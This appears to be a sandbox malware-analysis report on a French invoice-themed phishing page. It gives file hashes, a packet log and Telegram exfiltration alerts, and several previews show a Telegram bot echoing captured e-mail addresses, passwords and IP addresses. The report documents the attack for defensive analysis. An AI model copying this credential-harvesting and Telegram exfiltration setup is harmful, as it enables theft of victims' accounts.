                                                        SHA1:728389C2AD301696EFAC02D6E571FBC67A833D1E
                                                        SHA-256:8D80B57D5C9C51675C1759F9AD6DC0D0FF75FA88CC7D907098F17D17EEF091B3
                                                        SHA-512:55882EFC52E9AD4CC134DAD486F13EFCCFA4DB107808E254FB83ACD6C7928EF79F5AAB7747B231D690538ACFB89D27447AFA6B43278ED62F6CBDA72B261A72FA
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"ok":true,"result":{"message_id":30053,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":1742913933,"text":"\ud83c\udff4\u200d\u2620\ufe0f LogCopy \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : s4dae2@ymxrji.net\nMot de passe : +3HApb)0*8w$o>Zj\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":29,"length":17,"type":"email"},{"offset":84,"length":12,"type":"url"},{"offset":196,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (52853)
                                                        Category:downloaded
                                                        Size (bytes):407279
                                                        Entropy (8bit):5.474568422670314
                                                        Encrypted:false
                                                        SSDEEP:12288:fpgrZxSAoNEJb0Wie75aUXGuyQZhK4O0s:RCVoNE0Wie75aUWmnO0s
                                                        MD5:2697BF25AFB0982DFA17C73536F934C1
                                                        SHA1:7D7DB122D0639CD1F1A53EB6018D6D713D312679
                                                        SHA-256:FB798BB21731986940CF3A9950FBCA386E03633E9A45497701E71F9B87D132EA
                                                        SHA-512:658EE630973F04FA367B366C1AC838FA49FCFF01682899F7480ED03201DE5AB7B95420DDC5C2DA116FE05B90A09EF1798B256628AB56D248A1618FDCDD0D79CA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdn.tailwindcss.com/3.4.16
                                                        Preview:(()=>{var qv=Object.create;var Hi=Object.defineProperty;var $v=Object.getOwnPropertyDescriptor;var Lv=Object.getOwnPropertyNames;var Mv=Object.getPrototypeOf,Nv=Object.prototype.hasOwnProperty;var df=r=>Hi(r,"__esModule",{value:!0});var hf=r=>{if(typeof require!="undefined")return require(r);throw new Error('Dynamic require of "'+r+'" is not supported')};var P=(r,e)=>()=>(r&&(e=r(r=0)),e);var x=(r,e)=>()=>(e||r((e={exports:{}}).exports,e),e.exports),Ge=(r,e)=>{df(r);for(var t in e)Hi(r,t,{get:e[t],enumerable:!0})},Bv=(r,e,t)=>{if(e&&typeof e=="object"||typeof e=="function")for(let i of Lv(e))!Nv.call(r,i)&&i!=="default"&&Hi(r,i,{get:()=>e[i],enumerable:!(t=$v(e,i))||t.enumerable});return r},pe=r=>Bv(df(Hi(r!=null?qv(Mv(r)):{},"default",r&&r.__esModule&&"default"in r?{get:()=>r.default,enumerable:!0}:{value:r,enumerable:!0})),r);var m,u=P(()=>{m={platform:"",env:{},versions:{node:"14.17.6"}}});var Fv,be,ft=P(()=>{u();Fv=0,be={readFileSync:r=>self[r]||"",statSync:()=>({mtimeMs:Fv++}),pro
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):21
                                                        Entropy (8bit):3.463280517810811
                                                        Encrypted:false
                                                        SSDEEP:3:YMESl4n:YMEA4
                                                        MD5:5FC0F7551D7401CCA01F4932344A252B
                                                        SHA1:5713D2E3279812EC2B743C3E7A53C0F78312097E
                                                        SHA-256:5E4D1A9C2B59CEF553795198E0704550644281A2597D270337902B70F13ABCCD
                                                        SHA-512:52EA7017462F171050150C84341B9087339407B87B1E0D0406AFB4D3BB8097697802B71805E1B13AD53D1C2991098E3573485A481E86505B35BF9AF23B01DBB2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"ip":"161.77.13.20"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:assembler source, Unicode text, UTF-8 text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):2458
                                                        Entropy (8bit):4.883444272556873
                                                        Encrypted:false
                                                        SSDEEP:48:sF36djO5NGnTIRz3Q/FW0tnKqdB0TJdq3P3DhKXOwTRL8u65KssIEq6nwVNiH5zs:sFqBEocRr4Ff7UHqf9WTRPCfs7Tn2iH2
                                                        MD5:AC257F7D4C4B39C213CB538260CC61C7
                                                        SHA1:A716CCD458C16882B93E5AC754659295A4E1CCDC
                                                        SHA-256:CBCD88095CA901352EC4A966FBFA27986BC1144321FCE84C8BC4E6D55C04C7D6
                                                        SHA-512:2FB6D12C4BA694D0932FFB92753D0F5A608792C99732FEC1BCE25B635BED6F40E6314B534C0ABAF5399287BB9A81F643DD2CB258B0C0705ACB24475990FBFE5E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://facture-75823.web.app/styles_ad.css
                                                        Preview:/* Vid.o en plein .cran */...background-video {.. position: fixed;.. right: 0;.. bottom: 0;.. min-width: 100%;.. min-height: 100%;.. background-image: url('https://i.ibb.co/6cXYk9HM/Capture-d-cran-2025-02-11-144928.png');.. background-size: cover;.. background-position: center;.. filter: blur(8px);.. z-index: -1;..}..../* Pour masquer le d.filement lors du chargement */..body {.. overflow: hidden;..}..../* Loader - Couvre l'.cran complet */..#loader {.. position: fixed;.. top: 0;.. left: 0;.. width: 100vw;.. height: 100vh;.. background: none !important; /* Suppression du fond blanc */.. display: flex;.. justify-content: center;.. align-items: center;.. z-index: 1000;..}..../* Masquer compl.tement le loader apr.s chargement */..#loader.hidden {.. display: none !important;..}..../* Style pour le logo dans le loader */..#loader img {.. width: 100px; /* Taille r.duite du logo */.. height: auto;.. animation: s
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):681
                                                        Entropy (8bit):5.45638821900406
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/POLr9EUwJCSMFEIua32VlopWE5r/Do/D7DiF5qbGsRB2DOexWb2RKJFtHz:YKOHFrSf0SMFEdaOmWcngCF5qbHn2DO5
                                                        MD5:3F01615D45576582D89E1701AF526E23
                                                        SHA1:9CC61B50725C47B5F299607CAE5DAB30DD0BA57C
                                                        SHA-256:E186D1CA2E8E8780270B710B4C40A7CC9474AA7913EFF8E22035E1EF7270B968
                                                        SHA-512:04138C98906A7C4DA287D8C888EE35931064B94157694E154CF23D9B6D4544224157C7F70BC6191A47E8A719CF440B2BAA9C742DF6B29EA2F2ADCED977529FA6
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"ok":true,"result":{"message_id":30055,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":1742913957,"text":"\ud83c\udff4\u200d\u2620\ufe0f LogCopy \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : tgza2n@qxoyv.io\nMot de passe : NdrbMHgek&4KP@?YR\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":29,"length":15,"type":"email"},{"offset":83,"length":12,"type":"url"},{"offset":195,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 640 x 315, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):363482
                                                        Entropy (8bit):7.99156222265069
                                                        Encrypted:true
                                                        SSDEEP:6144:/VtcP7YwxyFeQLYMn/5mkBbPAUaSka9KhF2jqLCdeytv1kLU1IC3t6C3O0D2Imwf:ttgheepM/384UhFmdeyyMIC3wC3iIl
                                                        MD5:FF2A0004967CC5F1587DA51421C28C4F
                                                        SHA1:3C7F497EEEDAD687962DEC45236369FE39E7B5C5
                                                        SHA-256:8D4FDC57CA945172EAFC5FFA3CE5923C5A128D8D3353EBB6F6A0059FD2FF935E
                                                        SHA-512:3221ED355479DA1E7793CA35955A88E3F1C39316CFCD493D392C3B228658E60B4A1A2D2A4F0807798F978AF23C30279E8A9B0291F0FC85A07E0013B18CEBF901
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.......;.....M(0.....eXIfII*...........................V...........^...(.......................i.......f........v.......v................0210....................0100................................;.......c.Q.....pHYs..........o.d.. .IDATx..{.W....+......v...m......6.9....H..s.Z.s.A....x...........T.1..gv..^]\..<'.S.Ns~.Tu......H)..R.......h......P..B=B.3.i.\.@..Q.:.G..!../s<...c(.*l...TX).S....<....<........}.n...A.........1.[.@..).. ..(....u3...@K.....U(k[......X.W..C..n...C.k3..D..Q.x..gQ.~..~....X.2J<....."J./......R....e.........R.....P..r.6.....l..Q..F.;...2.B.p.M....?0....... :4.h_..}q.{.p...h`....o..F..Eo....!.#}....D.......?.@`..Wo7.....Y.P.......P+.q5..&x.......Y`..`v....;bv..lpK...}1..3.N...5d.......cf...#..y&.{.F...^..}z...>Z8F...9.<.....E..p.3.N.i....a-|#:x.t....`[~...z........F............1.7.r....!4$u..Q3".F..0.....=l'.:Q...0...1kB.V..q;z'...&..t`h.a....L...qbp....v.w...Qa......_.<(i^..^..3...i-..oZ..L....p.p
                                                        No static file info
                                                        Icon Hash:00b29a8e86828200

                                                        Download Network PCAP: filteredfull

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-03-25T15:45:32.940767+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749716149.154.167.220443TCP
                                                        2025-03-25T15:45:32.962278+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749715149.154.167.220443TCP
                                                        2025-03-25T15:45:34.027139+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749719149.154.167.220443TCP
                                                        2025-03-25T15:45:34.063797+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749720149.154.167.220443TCP
                                                        2025-03-25T15:45:56.891950+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749729149.154.167.220443TCP
                                                        2025-03-25T15:45:56.919140+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749728149.154.167.220443TCP
                                                        2025-03-25T15:45:57.675254+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749731149.154.167.220443TCP
                                                        2025-03-25T15:45:57.852076+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749732149.154.167.220443TCP
                                                        • Total Packets: 526
                                                        • 443 (HTTPS)
                                                        • 80 (HTTP)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 25, 2025 15:44:51.179352045 CET49674443192.168.2.72.23.227.208
                                                        Mar 25, 2025 15:44:51.179392099 CET49675443192.168.2.72.23.227.208
                                                        Mar 25, 2025 15:44:51.179440022 CET49673443192.168.2.72.23.227.208
                                                        Mar 25, 2025 15:44:52.523148060 CET49677443192.168.2.72.18.98.62
                                                        Mar 25, 2025 15:44:52.523159027 CET4967680192.168.2.723.199.215.203
                                                        Mar 25, 2025 15:45:00.460875988 CET49691443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:45:00.460925102 CET44349691142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:45:00.461155891 CET49691443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:45:00.461405993 CET49691443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:45:00.461421967 CET44349691142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:45:00.685420990 CET44349691142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:45:00.685498953 CET49691443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:45:00.686985016 CET49691443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:45:00.686994076 CET44349691142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:45:00.687386036 CET44349691142.251.40.164192.168.2.7
                                                        Mar 25, 2025 15:45:00.727592945 CET49691443192.168.2.7142.251.40.164
                                                        Mar 25, 2025 15:45:00.790082932 CET49675443192.168.2.72.23.227.208
                                                        Mar 25, 2025 15:45:00.790143967 CET49674443192.168.2.72.23.227.208
                                                        Mar 25, 2025 15:45:00.790189981 CET49673443192.168.2.72.23.227.208
                                                        Mar 25, 2025 15:45:01.618102074 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.618145943 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.618277073 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.618402958 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.618432999 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.618498087 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.618536949 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.618551970 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.618730068 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.618746042 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.826425076 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.826493979 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.827514887 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.827528954 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.827730894 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.828002930 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.830884933 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.830969095 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.831687927 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:01.831708908 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.832201004 CET44349693142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.868273020 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:01.876636982 CET49693443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:02.134464025 CET4967680192.168.2.723.199.215.203
                                                        Mar 25, 2025 15:45:02.134531021 CET49677443192.168.2.72.18.98.62
                                                        Mar 25, 2025 15:45:04.491528988 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.491628885 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.505356073 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.505419970 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.521166086 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.521253109 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.521262884 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.560858965 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.589627028 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.594091892 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.594119072 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.594160080 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.594185114 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.594346046 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.599805117 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.607414961 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.607434034 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.607527018 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.607533932 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.607613087 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.614352942 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.614479065 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:04.614686966 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.614949942 CET49692443192.168.2.7142.250.80.33
                                                        Mar 25, 2025 15:45:04.614964008 CET44349692142.250.80.33192.168.2.7
                                                        Mar 25, 2025 15:45:05.186753988 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.186793089 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.187027931 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.187864065 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.187882900 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.208812952 CET49697443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.208847046 CET44349697199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.208915949 CET49697443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.209060907 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.209072113 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.209132910 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.209664106 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.209685087 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.209701061 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.209707975 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.210165977 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.210165977 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.210459948 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.210474968 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.210592031 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.210607052 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.210608006 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.210624933 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.210782051 CET49697443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.210798025 CET44349697199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.409987926 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.410062075 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.410953999 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.410959959 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.411159039 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.411367893 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.414544106 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.414724112 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.415333033 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.415345907 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.415586948 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.415884972 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.419001102 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.419094086 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.419353962 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.419358969 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.419384003 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.419851065 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.419853926 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.419853926 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.419864893 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.420067072 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.420347929 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.420666933 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.452265978 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.456264019 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.460263968 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.464298010 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.675920010 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.675975084 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.676028967 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.676393986 CET49696443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.676409006 CET44349696172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.677922010 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.677956104 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.678031921 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.678138018 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.678153038 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.678499937 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.678658962 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.678710938 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.678747892 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.678747892 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.679852962 CET49699443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.679864883 CET44349699199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.712894917 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713094950 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713143110 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.713162899 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713265896 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713367939 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713386059 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.713395119 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713452101 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.713459015 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713500977 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.713682890 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.713696003 CET49700443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.713701010 CET44349700199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.790035009 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.790286064 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.790343046 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.790652990 CET49698443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.790663958 CET44349698199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.816690922 CET44349697199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.816773891 CET49697443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.817130089 CET49697443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.817140102 CET44349697199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.817887068 CET44349697199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.818151951 CET49697443192.168.2.7199.36.158.100
                                                        Mar 25, 2025 15:45:05.864290953 CET44349697199.36.158.100192.168.2.7
                                                        Mar 25, 2025 15:45:05.893838882 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.894104004 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.894126892 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:05.894243956 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:05.894252062 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161412001 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161448002 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161468029 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161488056 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161506891 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161529064 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161547899 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161592960 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.161592960 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.161592960 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.161623955 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161688089 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.161696911 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161746979 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.161756992 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161931038 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.161984921 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.161992073 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163594007 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163618088 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163641930 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163662910 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163665056 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.163672924 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163696051 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163697958 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.163732052 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.163738966 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163780928 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163789034 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.163798094 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.163842916 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.164406061 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.164560080 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.164581060 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.164602041 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.164603949 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.164609909 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.164650917 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.165599108 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.165658951 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.165663958 CET49701443192.168.2.7172.67.41.16
                                                        Mar 25, 2025 15:45:06.165672064 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.165692091 CET44349701172.67.41.16192.168.2.7
                                                        Mar 25, 2025 15:45:06.165716887 CET49701443192.168.2.7172.67.41.16
